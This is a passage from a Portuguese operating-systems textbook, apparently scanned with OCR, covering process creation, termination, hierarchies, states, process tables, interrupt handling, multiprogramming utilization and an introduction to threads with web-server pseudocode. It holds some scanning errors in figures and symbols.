ciado. No Windows, quando um processo é iniciado, ele 
não tem uma janela, mas ele pode criar uma (ou mais), e 
a maioria o faz. Em ambos os sistemas, os usuários têm 
múltiplas janelas abertas de uma vez, cada uma executan- 
do algum processo. Utilizando o mouse, o usuário pode 
selecionar uma janela e interagir com o processo, por 
exemplo, fornecendo a entrada quando necessário. 

A última situação na qual processos são criados 
aplica-se somente aos sistemas em lote encontrados 
em grandes computadores. Pense no gerenciamento 
de estoque ao fim de um dia em uma cadeia de lojas, 
nesse caso usuários podem submeter tarefas em lote ao 
sistema (possivelmente de maneira remota). Quando 
o sistema operacional decide que ele tem os recursos 
para executar outra tarefa, ele cria um novo processo e 
executa a próxima tarefa a partir da fila de entrada nele. 

Tecnicamente, em todos esses casos, um novo pro- 
cesso é criado por outro já existente executando uma 
chamada de sistema de criação de processo. Esse outro 
processo pode ser um processo de usuário sendo exe- 
cutado, um processo de sistema invocado do teclado ou 
mouse, ou um processo gerenciador de lotes. O que esse 
processo faz é executar uma chamada de sistema para 
criar o novo processo. Essa chamada de sistema diz ao 
sistema operacional para criar um novo processo e indi- 
ca, direta ou indiretamente, qual programa executar nele. 

No UNIX, há apenas uma chamada de sistema para 
criar um novo processo: fork. Essa chamada cria um 
clone exato do processo que a chamou. Após a fork, os 
dois processos, o pai e o filho, têm a mesma imagem de 
memória, as mesmas variáveis de ambiente e os mes- 
mos arquivos abertos. E isso é tudo. Normalmente, o 
processo filho então executa execve ou uma chamada 
de sistema similar para mudar sua imagem de memó- 
ria e executar um novo programa. Por exemplo, quando 


um usuário digita um comando, por exemplo, sort, para 
o shell, este se bifurca gerando um processo filho, e o 
processo filho executa sort. O objetivo desse processo 
em dois passos é permitir que o processo filho manipule 
seus descritores de arquivos depois da fork, mas antes 
da execve, a fim de conseguir o redirecionamento de 
entrada padrão, saída padrão e erro padrão. 

No Windows, em comparação, uma única chama- 
da de função Win32, CreateProcess, lida tanto com a 
criação do processo, quanto com o carga do programa 
correto no novo processo. Essa chamada tem 10 parâ- 
metros, que incluem o programa a ser executado, os 
parâmetros de linha de comando para alimentar aquele 
programa, vários atributos de segurança, bits que con- 
trolam se os arquivos abertos são herdados, informa- 
ções sobre prioridades, uma especificação da janela a 
ser criada para o processo (se houver alguma) e um pon- 
teiro para uma estrutura na qual as informações sobre o 
processo recentemente criado é retornada para quem o 
chamou. Além do CreateProcess, Win32 tem mais ou 
menos 100 outras funções para gerenciar e sincronizar 
processos e tópicos relacionados. 

Tanto no sistema UNIX quanto no Windows, após 
um processo ser criado, o pai e o filho têm os seus pró- 
prios espaços de endereços distintos. Se um dos dois 
processos muda uma palavra no seu espaço de ende- 
reço, a mudança não é visível para o outro processo. 
No UNIX, o espaço de endereço inicial do filho é uma 
cópia do espaço de endereço do pai, mas há definitiva- 
mente dois espaços de endereços distintos envolvidos; 
nenhuma memória para escrita é compartilhada. Algu- 
mas implementações UNIX compartilham o programa 
de texto entre as duas, tendo em vista que isso não pode 
ser modificado. Alternativamente, o filho pode compar- 
tilhar toda a memória do pai, mas nesse caso, a memória 
é compartilhada no sistema copy-on-write (cópia-na- 
-escrita), o que significa que sempre que qualquer uma 
das duas quiser modificar parte da memória, aquele 
pedaço da memória é explicitamente copiado primeiro 
para certificar-se de que a modificação ocorra em uma 
área de memória privada. Novamente, nenhuma memó- 
ria que pode ser escrita é compartilhada. É possível, no 
entanto, que um processo recentemente criado compar- 
tilhe de alguns dos outros recursos do seu criador, como 
arquivos abertos. No Windows, os espaços de endere- 
ços do pai e do filho são diferentes desde o início. 


2.1.3 Término de processos 


Após um processo ter sido criado, ele começa a ser 
executado e realiza qualquer que seja o seu trabalho. No 


entanto, nada dura para sempre, nem mesmo os proces- 
sos. Cedo ou tarde, o novo processo terminará, normal- 
mente devido a uma das condições a seguir: 


1. Saída normal (voluntária). 

2. Erro fatal (involuntário). 

3. Saída por erro (voluntária). 

4. Morto por outro processo (involuntário). 


A maioria dos processos termina por terem realiza- 
do o seu trabalho. Quando um compilador termina de 
traduzir o programa dado a ele, o compilador executa 
uma chamada para dizer ao sistema operacional que 
ele terminou. Essa chamada é exit em UNIX e Exit- 
Process no Windows. Programas baseados em tela 
também dão suporte ao término voluntário. Processa- 
dores de texto, visualizadores da internet e programas 
similares sempre têm um ícone ou item no menu em 
que o usuário pode clicar para dizer ao processo para 
remover quaisquer arquivos temporários que ele tenha 
aberto e então conclui-lo. 

A segunda razão para o término é a que o processo 
descobre um erro fatal. Por exemplo, se um usuário di- 
gita o comando 


cc foo.c 


para compilar o programa foo.c e nao existe esse ar- 
quivo, o compilador simplesmente anuncia esse fato e 
termina a execução. Processos interativos com base em 
tela geralmente não fecham quando parâmetros ruins 
são dados. Em vez disso, eles abrem uma caixa de diá- 
logo e pedem ao usuário para tentar de novo. 

A terceira razão para o término é um erro causado 
pelo processo, muitas vezes decorrente de um erro de 
programa. Exemplos incluem executar uma instrução 
ilegal, referenciar uma memória não existente, ou divi- 
dir por zero. Em alguns sistemas (por exemplo, UNIX), 
um processo pode dizer ao sistema operacional que ele 
gostaria de lidar sozinho com determinados erros, nesse 
caso o processo é sinalizado (interrompido), em vez de 
terminado quando ocorrer um dos erros. 

A quarta razão pela qual um processo pode ser fi- 
nalizado ocorre quando o processo executa uma cha- 
mada de sistema dizendo ao sistema operacional para 
matar outro processo. Em UNIX, essa chamada é kill. A 
função Win32 correspondente é TerminateProcess. Em 
ambos os casos, o processo que mata o outro processo 
precisa da autorização necessária para fazê-lo. Em al- 
guns sistemas, quando um processo é finalizado, seja 
voluntariamente ou de outra maneira, todos os proces- 
sos que ele criou são de imediato mortos também. No 
entanto, nem o UNIX, tampouco o Windows, funcio- 
nam dessa maneira. 
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2.1.4 Hierarquias de processos 


Em alguns sistemas, quando um processo cria ou- 
tro, o processo pai e o processo filho continuam a ser 
associados de certas maneiras. O processo filho pode 
em si criar mais processos, formando uma hierarquia 
de processos. Observe que, diferentemente das plantas 
e dos animais que usam a reprodução sexual, um pro- 
cesso tem apenas um pai (mas zero, um, dois ou mais 
filhos). Então um processo lembra mais uma hidra do 
que, digamos, uma vaca. 

Em UNIX, um processo e todos os seus filhos e de- 
mais descendentes formam juntos um grupo de proces- 
sos. Quando um usuário envia um sinal do teclado, o 
sinal é entregue a todos os membros do grupo de pro- 
cessos associados com o teclado no momento (em geral 
todos os processos ativos que foram criados na janela 
atual). Individualmente, cada processo pode pegar o si- 
nal, ignorá-lo, ou assumir a ação predefinida, que é ser 
morto pelo sinal. 

Como outro exemplo de onde a hierarquia de proces- 
sos tem um papel fundamental, vamos examinar como 
o UNIX se inicializa logo após o computador ser liga- 
do. Um processo especial, chamado init, está presente na 
imagem de inicialização do sistema. Quando começa a 
ser executado, ele lê um arquivo dizendo quantos termi- 
nais existem, então ele se bifurca em um novo processo 
para cada terminal. Esses processos esperam que alguém 
se conecte. Se uma conexão é bem-sucedida, o processo 
de conexão executa um shell para aceitar os comandos. 
Esses comandos podem iniciar mais processos e assim 
por diante. Desse modo, todos os processos no sistema 
inteiro pertencem a uma única árvore, com init em sua 
raiz. 

Em comparação, o Windows não tem conceito de 
uma hierarquia de processos. Todos os processos são 
iguais. O único indício de uma hierarquia ocorre quan- 
do um processo é criado e o pai recebe um identificador 
especial (chamado de handle) que ele pode usar para 
controlar o filho. No entanto, ele é livre para passar esse 
identificador para algum outro processo, desse modo in- 
validando a hierarquia. Processos em UNIX não podem 
deserdar seus filhos. 


2.1.5 Estados de processos 


Embora cada processo seja uma entidade indepen- 
dente, com seu próprio contador de programa e estado 
interno, processos muitas vezes precisam interagir entre 
si. Um processo pode gerar alguma saída que outro pro- 
cesso usa como entrada. No comando shell 
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cat chapter1 chapter? chapter3 | grep tree 


o primeiro processo, executando cat, gera como saída a 
concatenação dos três arquivos. O segundo processo, exe- 
cutando grep, seleciona todas as linhas contendo a palavra 
“tree”. Dependendo das velocidades relativas dos dois pro- 
cessos (que dependem tanto da complexidade relativa dos 
programas, quanto do tempo de CPU que cada um teve), 
pode acontecer que grep esteja pronto para ser executado, 
mas não haja entrada esperando por ele. Ele deve então ser 
bloqueado até que alguma entrada esteja disponível. 
Quando um processo bloqueia, ele o faz porque logica- 
mente não pode continuar, em geral porque está esperando 
pela entrada que ainda não está disponível. Também é pos- 
sível que um processo que esteja conceitualmente pronto 
e capaz de executar seja bloqueado porque o sistema ope- 
racional decidiu alocar a CPU para outro processo por um 
tempo. Essas duas condições são completamente diferen- 
tes. No primeiro caso, a suspensão é inerente ao problema 
(você não pode processar a linha de comando do usuário 
até que ela tenha sido digitada). No segundo caso, trata-se 
de uma tecnicalidade do sistema (não ha CPUs suficientes 
para dar a cada processo seu proprio processador privado). 
Na Figura 2.2 vemos um diagrama de estado mostrando 
os três estados nos quais um processo pode se encontrar: 


1. Em execução (realmente usando a CPU naquele 
instante). 

2. Pronto (executável, temporariamente parado para 
deixar outro processo ser executado). 

3. Bloqueado (incapaz de ser executado até que al- 
gum evento externo aconteça). 


Claro, os primeiros dois estados são similares. Em 
ambos os casos, o processo está disposto a ser execu- 
tado, apenas no segundo temporariamente não há uma 
CPU disponível para ele. O terceiro estado é fundamen- 
talmente diferente dos dois primeiros, pois o processo 
não pode ser executado, mesmo que a CPU esteja ocio- 
sa e não tenha nada mais a fazer. 


[FIGURA 2.2) Um processo pode estar nos estados em 


execução, bloqueado ou pronto. Transições entre 
esses estados ocorrem como mostrado. 


Em execução 





Bloqueado 





1. O processo é bloqueado aguardando uma entrada 
2. O escalonador seleciona outro processo 

3. O escalonador seleciona esse processo 

4. A entrada torna-se disponível 


Como apresentado na Figura 2.2, quatro transições 
são possíveis entre esses três estados. A transição 1 
ocorre quando o sistema operacional descobre que um 
processo não pode continuar agora. Em alguns sistemas 
o processo pode executar uma chamada de sistema, 
como em pause, para entrar em um estado bloqueado. 
Em outros, incluindo UNIX, quando um processo lê de 
um pipe ou de um arquivo especial (por exemplo, um 
terminal) e não há uma entrada disponível, o processo é 
automaticamente bloqueado. 

As transições 2 e 3 são causadas pelo escalonador de 
processos, uma parte do sistema operacional, sem o pro- 
cesso nem saber a respeito delas. A transição 2 ocorre 
quando o escalonador decide que o processo em anda- 
mento foi executado por tempo suficiente, e é o momen- 
to de deixar outro processo ter algum tempo de CPU. 
A transição 3 ocorre quando todos os outros processos 
tiveram sua parcela justa e está na hora de o primeiro 
processo chegar à CPU para ser executado novamente. 
O escalonamento, isto é, decidir qual processo deve ser 
executado, quando e por quanto tempo, é um assunto im- 
portante; nós o examinaremos mais adiante neste capí- 
tulo. Muitos algoritmos foram desenvolvidos para tentar 
equilibrar as demandas concorrentes de eficiência para o 
sistema como um todo e justiça para os processos indivi- 
duais. Estudaremos algumas delas ainda neste capítulo. 

A transição 4 se verifica quando o evento externo 
pelo qual um processo estava esperando (como a che- 
gada de alguma entrada) acontece. Se nenhum outro 
processo estiver sendo executado naquele instante, a 
transição 3 será desencadeada e o processo começará a 
ser executado. Caso contrário, ele talvez tenha de espe- 
rar no estado de pronto por um intervalo curto até que a 
CPU esteja disponível e chegue sua vez. 

Usando o modelo de processo, torna-se muito mais 
fácil pensar sobre o que está acontecendo dentro do sis- 
tema. Alguns dos processos executam programas que 
levam adiante comandos digitados pelo usuário. Ou- 
tros processos são parte do sistema e lidam com tarefas 
como levar adiante solicitações para serviços de arqui- 
vos ou gerenciar os detalhes do funcionamento de um 
acionador de disco ou fita. Quando ocorre uma interrup- 
ção de disco, o sistema toma uma decisão para parar de 
executar o processo atual e executa o processo de disco, 
que foi bloqueado esperando por essa interrupção. As- 
sim, em vez de pensar a respeito de interrupções, pode- 
mos pensar sobre os processos de usuários, processos 
de disco, processos terminais e assim por diante, que 
bloqueiam quando estão esperando que algo aconteça. 
Quando o disco foi lido ou o caractere digitado, o pro- 
cesso esperando por ele é desbloqueado e está disponi- 
vel para ser executado novamente. 


Essa visão dá origem ao modelo mostrado na Figura 
2.3. Nele, o nível mais baixo do sistema operacional é 
o escalonador, com uma variedade de processos acima 
dele. Todo o tratamento de interrupções e detalhes sobre 
o início e parada de processos estão ocultos naquilo que 
é chamado aqui de escalonador, que, na verdade, não 
tem muito código. O resto do sistema operacional é bem 
estruturado na forma de processos. No entanto, poucos 
sistemas reais são tão bem estruturados como esse. 


O nível mais baixo de um sistema operacional 
estruturado em processos controla interrupções e 
escalonamento. Acima desse nível estão processos 
sequenciais. 


Processos 





Escalonador 


2.1.6 Implementação de processos 


Para implementar o modelo de processos, o sistema 
operacional mantém uma tabela (um arranjo de estrutu- 
ras) chamada de tabela de processos, com uma entra- 
da para cada um deles. (Alguns autores cnamam essas 
entradas de blocos de controle de processo.) Essas 
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entradas contêm informações importantes sobre o es- 
tado do processo, incluindo o seu contador de progra- 
ma, ponteiro de pilha, alocação de memória, estado dos 
arquivos abertos, informação sobre sua contabilidade e 
escalonamento e tudo o mais que deva ser salvo quando 
o processo é trocado do estado em execução para pronto 
ou bloqueado, de maneira que ele possa ser reiniciado 
mais tarde como se nunca tivesse sido parado. 

A Figura 2.4 mostra alguns dos campos fundamen- 
tais em um sistema típico: os campos na primeira coluna 
relacionam-se ao gerenciamento de processo. Os outros 
dois relacionam-se ao gerenciamento de memória e de 
arquivos, respectivamente. Deve-se observar que pre- 
cisamente quais campos cada tabela de processo tem é 
algo altamente dependente do sistema, mas esse número 
dá uma ideia geral dos tipos de informações necessárias. 

Agora que examinamos a tabela de processo, é pos- 
sível explicar um pouco mais sobre como a ilusão de 
múltiplos processos sequenciais é mantida em uma (ou 
cada) CPU. Associada com cada classe de E/S há um 
local (geralmente em um local fixo próximo da parte in- 
ferior da memória) chamado de vetor de interrupção. 
Ele contém o endereço da rotina de serviço de interrup- 
ção. Suponha que o processo do usuário 3 esteja sendo 
executado quando ocorre uma interrupção de disco. O 
contador de programa do processo do usuário 3, palavra 
de estado de programa, e, às vezes, um ou mais regis- 
tradores são colocados na pilha (atual) pelo hardware 
de interrupção. O computador, então, desvia a execução 


(cj Alguns dos campos de uma entrada típica na tabela de processos. 





Gerenciamento de processo 


Gerenciamento de memória 


Gerenciamento de arquivo 





Registros 

Contador de programa de texto 
Palavra de estado do programa 
Ponteiro da pilha de dados 
Estado do processo 
Prioridade de pilha 
Parâmetros de escalonamento 

ID do processo 

Processo pai 

Grupo de processo 

Sinais 

Momento em que um processo foi iniciado 
Tempo de CPU usado 


Tempo de CPU do processo filho 








Tempo do alarme seguinte 


Ponteiro para informações sobre o segmento 


Ponteiro para informações sobre o segmento 


Ponteiro para informações sobre o segmento 


Diretório-raiz 

Diretório de trabalho 
Descritores de arquivo 
ID do usuário 

ID do grupo 
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para o endereço especificado no vetor de interrupção. 
Isso é tudo o que o hardware faz. Daqui em diante, é 
papel do software, em particular, realizar a rotina do 
serviço de interrupção. 

Todas as interrupções começam salvando os regis- 
tradores, muitas vezes na entrada da tabela de processo 
para o processo atual. Então a informação empurrada 
para a pilha pela interrupção é removida e o ponteiro de 
pilha é configurado para apontar para uma pilha tem- 
porária usada pelo tratador de processos. Ações como 
salvar os registradores e configurar o ponteiro da pilha 
não podem ser expressas em linguagens de alto nível, 
como C, por isso elas são desempenhadas por uma pe- 
quena rotina de linguagem de montagem, normalmente 
a mesma para todas as interrupções, já que o trabalho 
de salvar os registros é idêntico, não importa qual seja a 
causa da interrupção. 

Quando essa rotina é concluída, ela chama uma 
rotina C para fazer o resto do trabalho para esse tipo 
específico de interrupção. (Presumimos que o sistema 
operacional seja escrito em C, a escolha mais comum 
para todos os sistemas operacionais reais). Quando o 
trabalho tiver sido concluído, possivelmente deixando 
algum processo agora pronto, o escalonador é chamado 
para ver qual é o próximo processo a ser executado. De- 
pois disso, o controle é passado de volta ao código de 
linguagem de montagem para carregar os registradores 
e mapa de memória para o processo agora atual e ini- 
ciar a sua execução. O tratamento e o escalonamento de 
interrupção estão resumidos na Figura 2.5. Vale a pena 
observar que os detalhes variam de alguma maneira de 
sistema para sistema. 


lc) FAJ O esqueleto do que o nível mais baixo do sistema 
operacional faz quando ocorre uma interrupção. 


1. O hardware empilha o contador de programa etc. 

2. O hardware carrega o novo contador de programa a partir 
do arranjo de interrupções. 

3. Ovetor de interrupções em linguagem de montagem 
salva os registradores. 

4. O procedimento em linguagem de montagem 
configura uma nova pilha. 

5. O serviço de interrupção em C executa (em geral lê e 
armazena temporariamente a entrada). 

6. O escalonador decide qual processo é o próximo a 
executar. 

7. O procedimento em C retorna para o código em 
linguagem de montagem. 

8. O procedimento em linguagem de montagem inicia o 
novo processo atual. 


Um processo pode ser interrompido milhares de ve- 
zes durante sua execução, mas a ideia fundamental é 
que, após cada interrupção, o processo retorne precisa- 
mente para o mesmo estado em que se encontrava antes 
de ser interrompido. 


2.1.7 Modelando a multiprogramação 


Quando a multiprogramação é usada, a utilização da 
CPU pode ser aperfeiçoada. Colocando a questão de ma- 
neira direta, se o processo médio realiza computações 
apenas 20% do tempo em que está na memória, então 
com cinco processos ao mesmo tempo na memória, a 
CPU deve estar ocupada o tempo inteiro. Entretanto, esse 
modelo é irrealisticamente otimista, tendo em vista que 
ele presume de modo tácito que todos os cinco processos 
jamais estarão esperando por uma E/S ao mesmo tempo. 

Um modelo melhor é examinar o uso da CPU a par- 
tir de um ponto de vista probabilístico. Suponha que um 
processo passe uma fração p de seu tempo esperando 
que os dispositivos de E/S sejam concluídos. Com n 
processos na memória ao mesmo tempo, a probabilidade 
de que todos os processos n estejam esperando para E/S 
(caso em que a CPU estará ociosa) é p”. A utilização da 
CPU é então dada pela fórmula 


Utilização da CPU = 1 —p” 


A Figura 2.6 mostra a utilização da CPU como uma fun- 
ção de n, que é chamada de grau de multiprogramação. 

Segundo a figura, fica claro que se os processos pas- 
sam 80% do tempo esperando por dispositivos de E/S, 
pelo menos 10 processos devem estar na memória ao 
mesmo tempo para que a CPU desperdice menos de 
10%. Quando você percebe que um processo interativo 
esperando por um usuário para digitar algo em um ter- 
minal (ou clicar em um ícone) está no estado de espera 


(elu) EAJ Utilização da CPU como uma função do número de 
processos na memória. 
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de E/S, deve ficar claro que tempos de espera de E/S de 
80% ou mais não são incomuns. Porém mesmo em ser- 
vidores, processos executando muitas operações de E/S 
em disco muitas vezes terão essa percentagem ou mais. 

Levando em consideração a precisão, deve ser des- 
tacado que o modelo probabilístico descrito há pouco é 
apenas uma aproximação. Ele presume implicitamente 
que todos os n processos são independentes, significan- 
do que é bastante aceitável para um sistema com cin- 
co processos na memória ter três em execução e dois 
esperando. Mas com uma única CPU, não podemos 
ter três processos sendo executados ao mesmo tempo, 
portanto o processo que ficar pronto enquanto a CPU 
está ocupada terá de esperar. Então, os processos não 
são independentes. Um modelo mais preciso pode ser 
construído usando a teoria das filas, mas o ponto que 
estamos sustentando — a multiprogramação deixa que 
os processos usem a CPU quando ela estaria em outras 
circunstâncias ociosa — ainda é válido, mesmo que as 
verdadeiras curvas da Figura 2.6 sejam ligeiramente di- 
ferentes daquelas mostradas na imagem. 

Embora o modelo da Figura 2.6 seja bastante sim- 
ples, ele pode ser usado para realizar previsões especi- 
ficas, embora aproximadas, a respeito do desempenho 
da CPU. Suponha, por exemplo, que um computador 
tenha 8 GB de memória, com o sistema operacional e 
suas tabelas ocupando 2 GB e cada programa de usuá- 
rio também ocupando 2 GB. Esses tamanhos permitem 
que três programas de usuários estejam na memória si- 
multaneamente. Com uma espera de E/S média de 80%, 
temos uma utilização de CPU (ignorando a sobrecarga 
do sistema operacional) de 1 — 0,8º ou em torno de 49%. 
Acrescentar outros 8 GB de memória permite que o 
sistema aumente seu grau de multiprogramação de três 
para sete, aumentando desse modo a utilização da CPU 
para 79%. Em outras palavras, os 8 GB adicionais au- 
mentarão a utilização da CPU em 30%. 

Acrescentar outros 8 GB ainda aumentaria a utili- 
zação da CPU apenas de 79% para 91%, desse modo 
elevando a utilização da CPU em apenas 12% a mais. 
Usando esse modelo, o proprietário do computador 
pode decidir que a primeira adição foi um bom investi- 
mento, mas a segunda, não. 


2.2 Threads 


Em sistemas operacionais tradicionais, cada processo 
tem um espaço de endereçamento e um único thread de 
controle. Na realidade, essa é quase a definição de um pro- 
cesso. Não obstante isso, em muitas situações, é desejável 
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ter múltiplos threads de controle no mesmo espaço de en- 
dereçamento executando em quase paralelo, como se eles 
fossem (quase) processos separados (exceto pelo espaço 
de endereçamento compartilhado). Nas seções a seguir, 
discutiremos essas situações e suas implicações. 


2.2.1 Utilização de threads 


Por que alguém iria querer ter um tipo de proces- 
so dentro de um processo? Na realidade, há várias 
razões para a existência desses miniprocessos, chama- 
dos threads. Vamos examinar agora algumas delas. 
A principal razão para se ter threads é que em mui- 
tas aplicações múltiplas atividades estão ocorrendo 
simultaneamente e algumas delas podem bloquear de 
tempos em tempos. Ao decompormos uma aplicação 
dessas em múltiplos threads sequenciais que são exe- 
cutados em quase paralelo, o modelo de programação 
torna-se mais simples. 

Já vimos esse argumento antes. É precisamente o ar- 
gumento para se ter processos. Em vez de pensar a res- 
peito de interrupções, temporizadores e chaveamentos 
de contextos, podemos pensar a respeito de processos 
em paralelo. Apenas agora com os threads acrescenta- 
mos um novo elemento: a capacidade para as entidades 
em paralelo compartilharem um espaço de endereça- 
mento e todos os seus dados entre si. Essa capacidade é 
essencial para determinadas aplicações, razão pela qual 
ter múltiplos processos (com seus espaços de endereça- 
mento em separado) não funcionará. 

Um segundo argumento para a existência dos threads 
é que como eles são mais leves do que os processos, 
eles são mais fáceis (isto é, mais rápidos) para criar e 
destruir do que os processos. Em muitos sistemas, criar 
um thread é algo de 10 a 100 vezes mais rápido do que 
criar um processo. Quando o número necessário de 
threads muda dinâmica e rapidamente, é útil se contar 
com essa propriedade. 

Uma terceira razão para a existência de threads tam- 
bém é o argumento do desempenho. O uso de threads 
não resulta em um ganho de desempenho quando todos 
eles são limitados pela CPU, mas quando há uma com- 
putação substancial e também E/S substancial, contar 
com threads permite que essas atividades se sobrepo- 
nham, acelerando desse modo a aplicação. 

Por fim, threads são úteis em sistemas com múltiplas 
CPUs, onde o paralelismo real é possível. Voltaremos a 
essa questão no Capítulo 8. 

É mais fácil ver por que os threads são úteis obser- 
vando alguns exemplos concretos. Como um primeiro 
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exemplo, considere um processador de texto. Processa- 
dores de texto em geral exibem o documento que está 
sendo criado em uma tela formatada exatamente como 
aparecerá na página impressa. Em particular, todas as 
quebras de linha e quebras de página estão em suas po- 
sições finais e corretas, de maneira que o usuário pode 
inspecioná-las e mudar o documento se necessário (por 
exemplo, eliminar viúvas e órfãos — linhas incomple- 
tas no início e no fim das páginas, que são consideradas 
esteticamente desagradáveis). 

Suponha que o usuário esteja escrevendo um livro. 
Do ponto de vista de um autor, é mais fácil manter o 
livro inteiro como um único arquivo para tornar mais 
fácil buscar por tópicos, realizar substituições globais e 
assim por diante. Como alternativa, cada capítulo pode 
ser um arquivo em separado. No entanto, ter cada seção 
e subseção como um arquivo em separado é um ver- 
dadeiro inconveniente quando mudanças globais preci- 
sam ser feitas para o livro inteiro, visto que centenas 
de arquivos precisam ser individualmente editados, um 
de cada vez. Por exemplo, se o padrão xxxx proposto 
é aprovado um pouco antes de o livro ser levado para 
impressão, todas as ocorrências de “Padrão provisório 
xxxx” têm de ser modificadas para “Padrão xxxx” no úl- 
timo minuto. Se o livro inteiro for um arquivo, em geral 
um único comando pode realizar todas as substituições. 
Em comparação, se o livro estiver dividido em mais de 
300 arquivos, cada um deve ser editado separadamente. 

Agora considere o que acontece quando o usuário 
subitamente apaga uma frase da página 1 de um livro 
de 800 páginas. Após conferir a página modificada para 
assegurar-se de que está corrigida, ele agora quer fazer 
outra mudança na página 600 e digita um comando di- 
zendo ao processador de texto para ir até aquela página 
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(possivelmente procurando por uma frase ocorrendo 
apenas ali). O processador de texto agora é forçado a 
reformatar o livro inteiro até a página 600, algo difícil, 
pois ele não sabe qual será a primeira linha da página 
600 até ter processado todas as páginas anteriores. Pode 
haver um atraso substancial antes que a página 600 seja 
exibida, resultando em um usuário infeliz. 

Threads podem ajudar aqui. Suponha que o proces- 
sador de texto seja escrito como um programa com dois 
threads. Um thread interage com o usuário e o outro 
lida com a reformatação em segundo plano. Tão logo 
a frase é apagada da página 1, o thread interativo diz 
ao de reformatação para reformatar o livro inteiro. En- 
quanto isso, o thread interativo continua a ouvir o te- 
clado e o mouse e responde a comandos simples como 
rolar a página 1 enquanto o outro thread está trabalhan- 
do com afinco no segundo plano. Com um pouco de 
sorte, a reformatação será concluída antes que o usuário 
peça para ver a página 600, então ela pode ser exibida 
instantaneamente. 

Enquanto estamos nesse exemplo, por que não 
acrescentar um terceiro thread? Muitos processadores 
de texto têm a capacidade de salvar automaticamente o 
arquivo inteiro para o disco em intervalos de poucos mi- 
nutos para proteger o usuário contra o perigo de perder 
um dia de trabalho caso o programa ou o sistema trave 
ou falte luz. O terceiro thread pode fazer backups de 
disco sem interferir nos outros dois. A situação com os 
três threads é mostrada na Figura 2.7. 

Se o programa tivesse apenas um thread, então sem- 
pre que um backup de disco fosse iniciado, comandos do 
teclado e do mouse seriam ignorados até que o backup 
tivesse sido concluído. O usuário certamente percebe- 
ria isso como um desempenho lento. Como alternativa, 
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eventos do teclado e do mouse poderiam interromper 
o backup do disco, permitindo um bom desempenho, 
mas levando a um modelo de programação complexo 
orientado à interrupção. Com três threads, o modelo de 
programação é muito mais simples: o primeiro thread 
apenas interage com o usuário, o segundo reformata o 
documento quando solicitado, o terceiro escreve os con- 
teúdos da RAM para o disco periodicamente. 

Deve ficar claro que ter três processos em separado 
não funcionaria aqui, pois todos os três threads precisam 
operar no documento. Ao existirem três threads em vez 
de três processos, eles compartilham de uma memória 
comum e desse modo têm acesso ao documento que está 
sendo editado. Com três processos isso seria impossível. 

Uma situação análoga existe com muitos outros pro- 
gramas interativos. Por exemplo, uma planilha eletrônica 
é um programa que permite a um usuário manter uma 
matriz, na qual alguns elementos são dados fornecidos 
pelo usuário e outros são calculados com base nos dados 
de entrada usando fórmulas potencialmente complexas. 
Quando um usuário muda um elemento, muitos outros 
precisam ser recalculados. Ao ter um thread de segundo 
plano para o recálculo, o thread interativo pode permitir 
ao usuário fazer mudanças adicionais enquanto o cálculo 
está sendo realizado. De modo similar, um terceiro thread 
pode cuidar sozinho dos backups periódicos para o disco. 

Agora considere mais um exemplo onde os threads 
são úteis: um servidor para um website. Solicitações 
para páginas chegam e a página solicitada é enviada 
de volta para o cliente. Na maioria dos websites, al- 
gumas páginas são mais acessadas do que outras. Por 
exemplo, a página principal da Sony é acessada mui- 
to mais do que uma página mais profunda na árvore 
contendo as especificações técnicas de alguma câme- 
ra em particular. Servidores da web usam esse fato 
para melhorar o desempenho mantendo uma coleção 
de páginas intensamente usadas na memória princi- 
pal para eliminar a necessidade de ir até o disco para 
buscá-las. Essa coleção é chamada de cache e é usada 
em muitos outros contextos também. Vimos caches 
de CPU no Capítulo 1, por exemplo. 

Uma maneira de organizar o servidor da web é 
mostrada na Figura 2.8(a). Aqui, um thread, o des- 
pachante, lê as requisições de trabalho que chegam 
da rede. Após examinar a solicitação, ele escolhe um 
thread operário ocioso (isto é, bloqueado) e passa 
para ele a solicitação, possivelmente escrevendo um 
ponteiro para a mensagem em uma palavra especial 
associada com cada thread. O despachante então 
acorda o operário adormecido, movendo-o do estado 
bloqueado para o estado pronto. 
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Quando o operário desperta, ele verifica se a solici- 
tação pode ser satisfeita a partir do cache da página da 
web, ao qual todos os threads têm acesso. Se não puder, 
ele começa uma operação read para conseguir a pági- 
na do disco e é bloqueado até a operação de disco ser 
concluída. Quando o thread é bloqueado na operação 
de disco, outro thread é escolhido para ser executado, 
talvez o despachante, a fim de adquirir mais trabalho, 
ou possivelmente outro operário esteja pronto para ser 
executado agora. 

Esse modelo permite que o servidor seja escrito 
como uma coleção de threads sequenciais. O programa 
do despachante consiste em um laço infinito para obter 
requisições de trabalho e entregá-las a um operário. 
Cada código de operário consiste em um laço infinito 
que aceita uma solicitação de um despachante e con- 
fere a cache da web para ver se a página está presente. 
Se estiver, ela é devolvida ao cliente, e o operário é blo- 
queado aguardando por uma nova solicitação. Se não 
estiver, ele pega a página do disco, retorna-a ao cliente 
e é bloqueado esperando por uma nova solicitação. 

Um esquema aproximado do código é dado na Figura 
2.9. Aqui, como no resto deste livro, TRUE é presumido 
que seja a constante 1. Do mesmo modo, buf e page são 
estruturas apropriadas para manter uma solicitação de 
trabalho e uma página da web, respectivamente. 

Considere como o servidor web teria de ser escri- 
to na ausência de threads. Uma possibilidade é fazê-lo 
operar um único thread. O laço principal do servidor 
web recebe uma solicitação, examina-a e a conduz até 
sua conclusão antes de receber a próxima. Enquanto es- 
pera pelo disco, o servidor está ocioso e não processa 
nenhum outro pedido chegando. Se o servidor web esti- 
ver sendo executado em uma máquina dedicada, como 
é o caso no geral, a CPU estará simplesmente ociosa 
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(ci): EAJ Um esquema aproximado do código para a Figura 
2.8. (a) Thread despachante. (b) Thread operário. 


while (TRUE) ( 
get next request(&buf); 
handoff work(&buf); 


(a) 


while (TRUE) ( 
wait for work(&buf) 
look for page in cache(&buf, &page); 
if (page not in cache(&page)) 
read page from disk(&buf, &page); 
return. page(&page); 


(b) 


enquanto o servidor estiver esperando pelo disco. O re- 
sultado final é que muito menos solicitações por segun- 
do poderão ser processadas. Assim, threads ganham um 
desempenho considerável, mas cada thread é programa- 
do sequencialmente, como de costume. 

Até o momento, vimos dois projetos possíveis: um 
servidor web multithread e um servidor web com um 
único thread. Suponha que múltiplos threads não este- 
jam disponíveis, mas que os projetistas de sistemas con- 
sideram inaceitável a perda de desempenho decorrente 
do único thread. Se uma versão da chamada de siste- 
ma read sem bloqueios estiver disponível, uma terceira 
abordagem é possível. Quando uma solicitação chegar, 
o único thread a examina. Se ela puder ser satisfeita a 
partir da cache, ótimo, se não, uma operação de disco 
sem bloqueios é inicializada. 

